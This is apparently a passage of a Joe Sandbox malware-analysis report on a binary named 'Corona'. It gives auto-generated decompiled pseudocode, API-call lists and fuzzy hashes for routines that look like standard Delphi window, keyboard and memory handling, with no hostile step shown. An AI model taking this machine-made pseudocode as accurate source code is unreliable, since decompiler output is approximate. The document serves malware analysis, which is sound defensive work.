                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Menu$LoadString
                                  • String ID:
                                  • API String ID: 3688185913-0
                                  • Opcode ID: 14979758ccab99fe7cabe0f5518fd9e9ec9ea6538c8f9a4fb7f28ad069071293
                                  • Instruction ID: 450757ef39f6326fd8ba85acb6853d09724175bea4c7dbb167d2a3dcea57cc38
                                  • Opcode Fuzzy Hash: 14979758ccab99fe7cabe0f5518fd9e9ec9ea6538c8f9a4fb7f28ad069071293
                                  • Instruction Fuzzy Hash: C8517D30A006455AEB21AF2A88857AF76E4AB45308F0558BFAC449B397CF7CDC498B5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 84%
                                  			E0044B5C4(char __edx, void* __edi) {
                                  				char _v5;
                                  				void* __ebx;
                                  				void* __ecx;
                                  				void* __ebp;
                                  				intOrPtr _t25;
                                  				intOrPtr* _t28;
                                  				intOrPtr* _t29;
                                  				intOrPtr _t42;
                                  				intOrPtr* _t45;
                                  				intOrPtr _t56;
                                  				intOrPtr _t57;
                                  				intOrPtr _t58;
                                  				intOrPtr _t59;
                                  				intOrPtr _t62;
                                  				void* _t63;
                                  				char _t64;
                                  				void* _t74;
                                  				intOrPtr _t75;
                                  				void* _t76;
                                  				void* _t77;
                                  
                                  				_t74 = __edi;
                                  				_t64 = __edx;
                                  				if(__edx != 0) {
                                  					_t77 = _t77 + 0xfffffff0;
                                  					_t25 = E00403420(_t25, _t76);
                                  				}
                                  				_v5 = _t64;
                                  				_t62 = _t25;
                                  				E00419098(_t63, 0);
                                  				_t28 =  *0x450e00; // 0x4503b4
                                  				 *((intOrPtr*)(_t28 + 4)) = _t62;
                                  				 *_t28 = 0x44b968;
                                  				_t29 =  *0x450e0c; // 0x4503bc
                                  				 *((intOrPtr*)(_t29 + 4)) = _t62;
                                  				 *_t29 = 0x44b974;
                                  				E0044B980(_t62);
                                  				 *((intOrPtr*)(_t62 + 0x3c)) = GetKeyboardLayout(0);
                                  				 *((intOrPtr*)(_t62 + 0x4c)) = E004030CC(1);
                                  				 *((intOrPtr*)(_t62 + 0x50)) = E004030CC(1);
                                  				 *((intOrPtr*)(_t62 + 0x54)) = E004030CC(1);
                                  				 *((intOrPtr*)(_t62 + 0x58)) = E004030CC(1);
                                  				_t42 = E004030CC(1);
                                  				 *((intOrPtr*)(_t62 + 0x7c)) = _t42;
                                  				L0040638C();
                                  				_t75 = _t42;
                                  				L004060D4();
                                  				 *((intOrPtr*)(_t62 + 0x40)) = _t42;
                                  				L004065C4();
                                  				_t11 = _t62 + 0x58; // 0x4449c06e
                                  				_t45 =  *0x450f4c; // 0x452914
                                  				 *((intOrPtr*)( *_t45))(0, 0, E00447D9C,  *_t11, 0, _t75, _t75, 0x5a, 0);
                                  				 *((intOrPtr*)(_t62 + 0x84)) = E0041C258(1);
                                  				 *((intOrPtr*)(_t62 + 0x88)) = E0041C258(1);
                                  				 *((intOrPtr*)(_t62 + 0x80)) = E0041C258(1);
                                  				E0044BDA0(_t62, _t62, _t63, _t74);
                                  				_t15 = _t62 + 0x84; // 0x38004010
                                  				_t56 =  *_t15;
                                  				 *((intOrPtr*)(_t56 + 0xc)) = _t62;
                                  				 *((intOrPtr*)(_t56 + 8)) = 0x44bc7c;
                                  				_t18 = _t62 + 0x88; // 0x90000000
                                  				_t57 =  *_t18;
                                  				 *((intOrPtr*)(_t57 + 0xc)) = _t62;
                                  				 *((intOrPtr*)(_t57 + 8)) = 0x44bc7c;
                                  				_t21 = _t62 + 0x80; // 0x94000000
                                  				_t58 =  *_t21;
                                  				 *((intOrPtr*)(_t58 + 0xc)) = _t62;
                                  				 *((intOrPtr*)(_t58 + 8)) = 0x44bc7c;
                                  				_t59 = _t62;
                                  				if(_v5 != 0) {
                                  					E00403478(_t59);
                                  					_pop( *[fs:0x0]);
                                  				}
                                  				return _t62;
                                  			}

                                  APIs
                                  • GetKeyboardLayout.USER32(00000000), ref: 0044B609
                                  • 72E7AC50.USER32(00000000,?,?,00000000,?,00439C2A,00000000,00000000,?,00000000,?,00000000,00439CA8), ref: 0044B65E
                                  • 72E7AD70.GDI32(00000000,0000005A,00000000,?,?,00000000,?,00439C2A,00000000,00000000,?,00000000,?,00000000,00439CA8), ref: 0044B668
                                  • 72E7B380.USER32(00000000,00000000,00000000,0000005A,00000000,?,?,00000000,?,00439C2A,00000000,00000000,?,00000000,?,00000000), ref: 0044B673
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: B380KeyboardLayout
                                  • String ID:
                                  • API String ID: 648844651-0
                                  • Opcode ID: a576d15c947695cdac0e20eec7c8d8843eee132a0ed68865e841ecc91e28d983
                                  • Instruction ID: d2a040ce9e9bc98946259e3464b4bf6165b8ec6f67b0d5e6841ffa5a462a6c8d
                                  • Opcode Fuzzy Hash: a576d15c947695cdac0e20eec7c8d8843eee132a0ed68865e841ecc91e28d983
                                  • Instruction Fuzzy Hash: 1B3117B06112059FE740EF29C8C2B997BE4FB05318F0491BAED08DF766DB7AD8048B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 669 44cc30-44cc40 670 44cc46-44cc4d 669->670 671 44ccda-44ccde 669->671 672 44ccd4 670->672 673 44cc53-44cc74 EnumWindows 670->673 672->671 673->672 674 44cc76-44cc91 GetWindow GetWindowLongA 673->674 675 44cc93 674->675 676 44cc9a-44cca7 674->676 675->676 676->672 677 44cca9-44ccd2 call 4136f8 SetWindowPos 676->677 677->672
                                  C-Code - Quality: 100%
                                  			E0044CC30(void* __eax, void* __ecx, char __edx) {
                                  				char _v12;
                                  				struct HWND__* _v20;
                                  				int _t17;
                                  				void* _t27;
                                  				struct HWND__* _t33;
                                  				void* _t35;
                                  				void* _t36;
                                  				long _t37;
                                  
                                  				_t37 = _t36 + 0xfffffff8;
                                  				_t27 = __eax;
                                  				_t17 =  *0x452bb0; // 0x2131714
                                  				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
                                  					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
                                  						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
                                  						_v12 = __edx;
                                  						EnumWindows(E0044CBC0, _t37);
                                  						_t5 = _t27 + 0x90; // 0x0
                                  						_t17 =  *_t5;
                                  						if( *((intOrPtr*)(_t17 + 8)) != 0) {
                                  							_t33 = GetWindow(_v20, 3);
                                  							_v20 = _t33;
                                  							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
                                  								_v20 = 0xfffffffe;
                                  							}
                                  							_t10 = _t27 + 0x90; // 0x0
                                  							_t17 =  *_t10;
                                  							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
                                  							if(_t35 >= 0) {
                                  								do {
                                  									_t13 = _t27 + 0x90; // 0x0
                                  									_t17 = SetWindowPos(E004136F8( *_t13, _t35), _v20, 0, 0, 0, 0, 0x213);
                                  									_t35 = _t35 - 1;
                                  								} while (_t35 != 0xffffffff);
                                  							}
                                  						}
                                  					}
                                  					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
                                  				}
                                  				return _t17;
                                  			}

                                  APIs
                                  • EnumWindows.USER32(0044CBC0), ref: 0044CC65
                                  • GetWindow.USER32(00000003,00000003), ref: 0044CC7D
                                  • GetWindowLongA.USER32 ref: 0044CC8A
                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 0044CCC9
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Window$EnumLongWindows
                                  • String ID:
                                  • API String ID: 4191631535-0
                                  • Opcode ID: ec7f48961f8dc0b696fa70ad36ec99b7a711554e43efa4f1528b16ea64c98eb6
                                  • Instruction ID: b21136fbe1e1a7ef4efa8573b02bae43e2fff50cc6aa42108ab334e903ddf784
                                  • Opcode Fuzzy Hash: ec7f48961f8dc0b696fa70ad36ec99b7a711554e43efa4f1528b16ea64c98eb6
                                  • Instruction Fuzzy Hash: 0F11A030645210AFEB50EF28CCC6F9673E8EB04324F19017AF958AB2D2C3789C40C759
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 680 4019fc-401a1e RtlInitializeCriticalSection 681 401a20-401a25 RtlEnterCriticalSection 680->681 682 401a2a-401a60 call 4013c0 * 3 LocalAlloc 680->682 681->682 689 401a91-401aa5 682->689 690 401a62 682->690 694 401ab1 689->694 695 401aa7-401aac RtlLeaveCriticalSection 689->695 691 401a67-401a79 690->691 691->691 693 401a7b-401a8a 691->693 693->689 695->694
                                  C-Code - Quality: 68%
                                  			E004019FC() {
                                  				void* _t11;
                                  				signed int _t13;
                                  				intOrPtr _t19;
                                  				void* _t20;
                                  				intOrPtr _t23;
                                  
                                  				_push(_t23);
                                  				_push(E00401AB2);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t23;
                                  				_push(0x4525c8);
                                  				L00401350();
                                  				if( *0x452049 != 0) {
                                  					_push(0x4525c8);
                                  					L00401358();
                                  				}
                                  				E004013C0(0x4525e8);
                                  				E004013C0(0x4525f8);
                                  				E004013C0(0x452624);
                                  				_t11 = LocalAlloc(0, 0xff8); // executed
                                  				 *0x452620 = _t11;
                                  				if( *0x452620 != 0) {
                                  					_t13 = 3;
                                  					do {
                                  						_t20 =  *0x452620; // 0x5bca20
                                  						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
                                  						_t13 = _t13 + 1;
                                  					} while (_t13 != 0x401);
                                  					 *((intOrPtr*)(0x45260c)) = 0x452608;
                                  					 *0x452608 = 0x452608;
                                  					 *0x452614 = 0x452608;
                                  					 *0x4525c0 = 1;
                                  				}
                                  				_pop(_t19);
                                  				 *[fs:eax] = _t19;
                                  				_push(E00401AB9);
                                  				if( *0x452049 != 0) {
                                  					_push(0x4525c8);
                                  					L00401360();
                                  					return 0;
                                  				}
                                  				return 0;
                                  			}

                                  APIs
                                  • RtlInitializeCriticalSection.KERNEL32(004525C8,00000000,00401AB2,?,?,00402296,00452608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401A12
                                  • RtlEnterCriticalSection.KERNEL32(004525C8,004525C8,00000000,00401AB2,?,?,00402296,00452608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401A25
                                  • LocalAlloc.KERNEL32(00000000,00000FF8,004525C8,00000000,00401AB2,?,?,00402296,00452608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401A4F
                                  • RtlLeaveCriticalSection.KERNEL32(004525C8,00401AB9,00000000,00401AB2,?,?,00402296,00452608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401AAC
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                  • String ID:
                                  • API String ID: 730355536-0
                                  • Opcode ID: 8d992bab54b366bbb3409039714fe17a846d884973171b375183100eae1a298f
                                  • Instruction ID: fa7dc51d4ec23576ec219d98cd212589ff5ce460954400c3ce56b976cac73690
                                  • Opcode Fuzzy Hash: 8d992bab54b366bbb3409039714fe17a846d884973171b375183100eae1a298f
                                  • Instruction Fuzzy Hash: 5501D6703457846EE31AAB699A167193AC0E74B706F40847BF801B6AF3E7FC8444CB6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00423864(int _a4) {
                                  				void* __ebx;
                                  				void* __ebp;
                                  				signed int _t2;
                                  				signed int _t3;
                                  				void* _t7;
                                  				int _t8;
                                  				void* _t12;
                                  				void* _t13;
                                  				void* _t17;
                                  				void* _t18;
                                  
                                  				_t8 = _a4;
                                  				if( *0x452920 == 0) {
                                  					 *0x4528f8 = E0042377C(0, _t8,  *0x4528f8, _t17, _t18);
                                  					_t7 =  *0x4528f8(_t8); // executed
                                  					return _t7;
                                  				}
                                  				_t3 = _t2 | 0xffffffff;
                                  				_t12 = _t8 + 0xffffffb4 - 2;
                                  				__eflags = _t12;
                                  				if(__eflags < 0) {
                                  					_t3 = 0;
                                  				} else {
                                  					if(__eflags == 0) {
                                  						_t8 = 0;
                                  					} else {
                                  						_t13 = _t12 - 1;
                                  						__eflags = _t13;
                                  						if(_t13 == 0) {
                                  							_t8 = 1;
                                  						} else {
                                  							__eflags = _t13 - 0xffffffffffffffff;
                                  							if(_t13 - 0xffffffffffffffff < 0) {
                                  								_t3 = 1;
                                  							}
                                  						}
                                  					}
                                  				}
                                  				__eflags = _t3 - 0xffffffff;
                                  				if(_t3 != 0xffffffff) {
                                  					return _t3;
                                  				} else {
                                  					return GetSystemMetrics(_t8);
                                  				}
                                  			}

                                  APIs
                                  • GetSystemMetrics.USER32 ref: 004238C6
                                    • Part of subcall function 0042377C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004237FC
                                  • KiUserCallbackDispatcher.NTDLL ref: 0042388C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: AddressCallbackDispatcherMetricsProcSystemUser
                                  • String ID: GetSystemMetrics
                                  • API String ID: 54681038-96882338
                                  • Opcode ID: def72a328a68513b707d10d80732f21a3c2b232fb0eedb8df014ff6c3fce43cc
                                  • Instruction ID: 57b566c20d2f4e411566e339f85b7675b107d6237a02cd692b1396c5036fa134
                                  • Opcode Fuzzy Hash: def72a328a68513b707d10d80732f21a3c2b232fb0eedb8df014ff6c3fce43cc
                                  • Instruction Fuzzy Hash: B0F0C2A07006211AD7047E74BE8422337E6EF46732FD04F23F1228D2E1C27CCA89520D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 43%
                                  			E0040BA08(void* __eax, void* __ebx) {
                                  				intOrPtr _v8;
                                  				char _v12;
                                  				char _v16;
                                  				intOrPtr _v20;
                                  				char _v24;
                                  				char _v28;
                                  				void* _t27;
                                  				void* _t37;
                                  				intOrPtr _t43;
                                  				void* _t48;
                                  				intOrPtr _t55;
                                  				intOrPtr _t56;
                                  				void* _t58;
                                  				void* _t59;
                                  				intOrPtr _t60;
                                  
                                  				_t58 = _t59;
                                  				_t60 = _t59 + 0xffffffe8;
                                  				_v12 = 0;
                                  				_push(_t58);
                                  				_push(0x40bade);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t60;
                                  				_v8 = 0xffffffff;
                                  				E00403EE4( &_v12, __eax);
                                  				E0040435C( &_v12);
                                  				_push( &_v16);
                                  				_t27 = E0040430C(_v12);
                                  				_push(_t27); // executed
                                  				L00406004(); // executed
                                  				_t48 = _t27;
                                  				if(_t48 == 0) {
                                  					_pop(_t55);
                                  					 *[fs:eax] = _t55;
                                  					_push(E0040BAE5);
                                  					return E00403E4C( &_v12);
                                  				} else {
                                  					_v20 = E004026BC(_t48);
                                  					_push(_t58);
                                  					_push(0x40bac1);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t60;
                                  					_push(_v20);
                                  					_push(_t48);
                                  					_push(_v16);
                                  					_t37 = E0040430C(_v12);
                                  					_push(_t37); // executed
                                  					L00405FFC(); // executed
                                  					if(_t37 != 0) {
                                  						_push( &_v28);
                                  						_push( &_v24);
                                  						_push(E0040BAF0);
                                  						_t43 = _v20;
                                  						_push(_t43);
                                  						L0040600C();
                                  						if(_t43 != 0) {
                                  							_v8 =  *((intOrPtr*)(_v24 + 8));
                                  						}
                                  					}
                                  					_pop(_t56);
                                  					 *[fs:eax] = _t56;
                                  					_push(0x40bac8);
                                  					return E004026DC(_v20);
                                  				}
                                  			}

                                  APIs
                                  • 739414E0.VERSION(00000000,?,00000000,0040BADE), ref: 0040BA4A
                                  • 739414C0.VERSION(00000000,?,00000000,?,00000000,0040BAC1,?,00000000,?,00000000,0040BADE), ref: 0040BA7F
                                  • 73941500.VERSION(?,0040BAF0,?,?,00000000,?,00000000,?,00000000,0040BAC1,?,00000000,?,00000000,0040BADE), ref: 0040BA99
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: 739414$73941500
                                  • String ID:
                                  • API String ID: 1696551078-0
                                  • Opcode ID: fa8a75a5305403ac69c7f2f9e2a3a2cdaaa72d90785727027f2ae7d77c4b9a37
                                  • Instruction ID: 95f9542b90d64b902932ade0986f9de82f611bea35365d2c9d7e3486098096f4
                                  • Opcode Fuzzy Hash: fa8a75a5305403ac69c7f2f9e2a3a2cdaaa72d90785727027f2ae7d77c4b9a37
                                  • Instruction Fuzzy Hash: AD213DB1B00609AFDB01EFA5CC919AEB7FCEB48704B514576F910F36D1D778AA008A68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 43%
                                  			E0040BA06(void* __eax, void* __ebx) {
                                  				intOrPtr _v8;
                                  				char _v12;
                                  				char _v16;
                                  				intOrPtr _v20;
                                  				char _v24;
                                  				char _v28;
                                  				void* _t27;
                                  				void* _t37;
                                  				intOrPtr _t43;
                                  				void* _t48;
                                  				intOrPtr _t55;
                                  				intOrPtr _t56;
                                  				void* _t58;
                                  				void* _t59;
                                  				intOrPtr _t60;
                                  
                                  				_t58 = _t59;
                                  				_t60 = _t59 + 0xffffffe8;
                                  				_v12 = 0;
                                  				_push(_t58);
                                  				_push(0x40bade);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t60;
                                  				_v8 = 0xffffffff;
                                  				E00403EE4( &_v12, __eax);
                                  				E0040435C( &_v12);
                                  				_push( &_v16);
                                  				_t27 = E0040430C(_v12);
                                  				_push(_t27); // executed
                                  				L00406004(); // executed
                                  				_t48 = _t27;
                                  				if(_t48 == 0) {
                                  					_pop(_t55);
                                  					 *[fs:eax] = _t55;
                                  					_push(E0040BAE5);
                                  					return E00403E4C( &_v12);
                                  				} else {
                                  					_v20 = E004026BC(_t48);
                                  					_push(_t58);
                                  					_push(0x40bac1);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t60;
                                  					_push(_v20);
                                  					_push(_t48);
                                  					_push(_v16);
                                  					_t37 = E0040430C(_v12);
                                  					_push(_t37); // executed
                                  					L00405FFC(); // executed
                                  					if(_t37 != 0) {
                                  						_push( &_v28);
                                  						_push( &_v24);
                                  						_push(E0040BAF0);
                                  						_t43 = _v20;
                                  						_push(_t43);
                                  						L0040600C();
                                  						if(_t43 != 0) {
                                  							_v8 =  *((intOrPtr*)(_v24 + 8));
                                  						}
                                  					}
                                  					_pop(_t56);
                                  					 *[fs:eax] = _t56;
                                  					_push(0x40bac8);
                                  					return E004026DC(_v20);
                                  				}
                                  			}

                                  APIs
                                  • 739414E0.VERSION(00000000,?,00000000,0040BADE), ref: 0040BA4A
                                  • 739414C0.VERSION(00000000,?,00000000,?,00000000,0040BAC1,?,00000000,?,00000000,0040BADE), ref: 0040BA7F
                                  • 73941500.VERSION(?,0040BAF0,?,?,00000000,?,00000000,?,00000000,0040BAC1,?,00000000,?,00000000,0040BADE), ref: 0040BA99
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: 739414$73941500
                                  • String ID:
                                  • API String ID: 1696551078-0
                                  • Opcode ID: 661085833e0bea8bd47ec95dcdbe8d963a55364808f607da40b6ce5be6428edf
                                  • Instruction ID: 9fcdf3018fcfce0c944acd244da8a4f266773b0829d259413805819a846e3391
                                  • Opcode Fuzzy Hash: 661085833e0bea8bd47ec95dcdbe8d963a55364808f607da40b6ce5be6428edf
                                  • Instruction Fuzzy Hash: 94211DB1B00609AFDB01EFA9CC919AFB7FCEB48304B514576B910F36D1D778AD008A68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E0044DA54(void* __eax, char* __ecx, struct tagMSG* __edx) {
                                  				int _t7;
                                  				int _t21;
                                  				MSG* _t30;
                                  				void* _t31;
                                  				char* _t32;
                                  
                                  				_t22 = __ecx;
                                  				_push(__ecx);
                                  				_t30 = __edx;
                                  				_t31 = __eax;
                                  				_t21 = 0;
                                  				_t7 = PeekMessageA(__edx, 0, 0, 0, 1); // executed
                                  				if(_t7 != 0) {
                                  					_t21 = 1;
                                  					if(_t30->message == 0x12) {
                                  						 *((char*)(_t31 + 0x9c)) = 1;
                                  					} else {
                                  						 *_t32 = 0;
                                  						if( *((short*)(_t31 + 0xda)) != 0) {
                                  							_t22 = _t32;
                                  							 *((intOrPtr*)(_t31 + 0xd8))();
                                  						}
                                  						if(E0044D9B4(_t31, _t30) == 0 &&  *_t32 == 0 && E0044D8AC(_t31, _t30) == 0 && E0044D8FC(_t31, _t22, _t30) == 0 && E0044D888(_t31, _t30) == 0) {
                                  							TranslateMessage(_t30);
                                  							DispatchMessageA(_t30); // executed
                                  						}
                                  					}
                                  				}
                                  				return _t21;
                                  			}

                                  APIs
                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0044DA67
                                  • TranslateMessage.USER32 ref: 0044DAD1
                                  • DispatchMessageA.USER32 ref: 0044DAD7
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Message$DispatchPeekTranslate
                                  • String ID:
                                  • API String ID: 4217535847-0
                                  • Opcode ID: a00bf5d97ec0a8114e3e335b1ee543c2ee6a3d2b24aa0af9799211d47867fcd3
                                  • Instruction ID: 117a82a1d019e0b0608a9482b61cf7bab67bbd9cbd9ed0af0cfb7f2c3174e571
                                  • Opcode Fuzzy Hash: a00bf5d97ec0a8114e3e335b1ee543c2ee6a3d2b24aa0af9799211d47867fcd3
                                  • Instruction Fuzzy Hash: 3E01F510F4860016FE30362A2805B7B93D54FE1758F18846FF485B7382CAAD4C06C22E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0042FA58(intOrPtr* __eax, signed int* __edx) {
                                  				signed int _v12;
                                  				short _v14;
                                  				char _v16;
                                  				signed int _v20;
                                  				intOrPtr* _v24;
                                  				char _v280;
                                  				signed int _t39;
                                  				signed int _t40;
                                  				signed int _t46;
                                  				intOrPtr* _t47;
                                  				signed int _t50;
                                  				signed int _t53;
                                  				intOrPtr _t55;
                                  				intOrPtr _t56;
                                  				signed int _t67;
                                  				signed int _t68;
                                  				void* _t73;
                                  				signed int* _t79;
                                  				intOrPtr _t90;
                                  				intOrPtr* _t96;
                                  
                                  				_t79 = __edx;
                                  				_t96 = __eax;
                                  				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
                                  					L4:
                                  					_t39 =  *_t79;
                                  					if(_t39 < 0x100 || _t39 > 0x108) {
                                  						_t40 =  *_t79;
                                  						__eflags = _t40 - 0x200;
                                  						if(_t40 < 0x200) {
                                  							L30:
                                  							__eflags = _t40 - 0xb00b;
                                  							if(_t40 == 0xb00b) {
                                  								E0042E394(_t96, _t79[1], _t40, _t79[2]);
                                  							}
                                  							L32:
                                  							return  *((intOrPtr*)( *_t96 - 0x14))();
                                  						}
                                  						__eflags = _t40 - 0x20a;
                                  						if(_t40 > 0x20a) {
                                  							goto L30;
                                  						}
                                  						__eflags =  *(_t96 + 0x50) & 0x00000080;
                                  						if(( *(_t96 + 0x50) & 0x00000080) != 0) {
                                  							L16:
                                  							_t46 =  *_t79 - 0x200;
                                  							__eflags = _t46;
                                  							if(__eflags == 0) {
                                  								L21:
                                  								_t47 =  *0x450fc8; // 0x452bb0
                                  								E0044E788( *_t47, _t79, _t96, __eflags);
                                  								goto L32;
                                  							}
                                  							_t50 = _t46 - 1;
                                  							__eflags = _t50;
                                  							if(_t50 == 0) {
                                  								L22:
                                  								__eflags =  *((char*)(_t96 + 0x5d)) - 1;
                                  								if(__eflags != 0) {
                                  									 *(_t96 + 0x54) =  *(_t96 + 0x54) | 0x00000001;
                                  									goto L32;
                                  								}
                                  								return E004032F8(_t96, __eflags);
                                  							}
                                  							_t53 = _t50 - 1;
                                  							__eflags = _t53;
                                  							if(_t53 == 0) {
                                  								 *(_t96 + 0x54) =  *(_t96 + 0x54) & 0x0000fffe;
                                  								goto L32;
                                  							}
                                  							__eflags = _t53 == 1;
                                  							if(_t53 == 1) {
                                  								goto L22;
                                  							}
                                  							_t55 =  *0x452b10; // 0x21312f4
                                  							__eflags =  *((char*)(_t55 + 0x20));
                                  							if( *((char*)(_t55 + 0x20)) == 0) {
                                  								goto L32;
                                  							} else {
                                  								_t56 =  *0x452b10; // 0x21312f4
                                  								__eflags =  *(_t56 + 0x1c);
                                  								if( *(_t56 + 0x1c) == 0) {
                                  									goto L32;
                                  								}
                                  								_t90 =  *0x452b10; // 0x21312f4
                                  								__eflags =  *_t79 -  *((intOrPtr*)(_t90 + 0x1c));
                                  								if( *_t79 !=  *((intOrPtr*)(_t90 + 0x1c))) {
                                  									goto L32;
                                  								}
                                  								GetKeyboardState( &_v280);
                                  								_v20 =  *_t79;
                                  								_v16 = E00444F20( &_v280);
                                  								_v14 = _t79[1];
                                  								_v12 = _t79[2];
                                  								return E004032F8(_t96, __eflags);
                                  							}
                                  							goto L21;
                                  						}
                                  						_t67 = _t40 - 0x203;
                                  						__eflags = _t67;
                                  						if(_t67 == 0) {
                                  							L15:
                                  							 *_t79 =  *_t79 - 2;
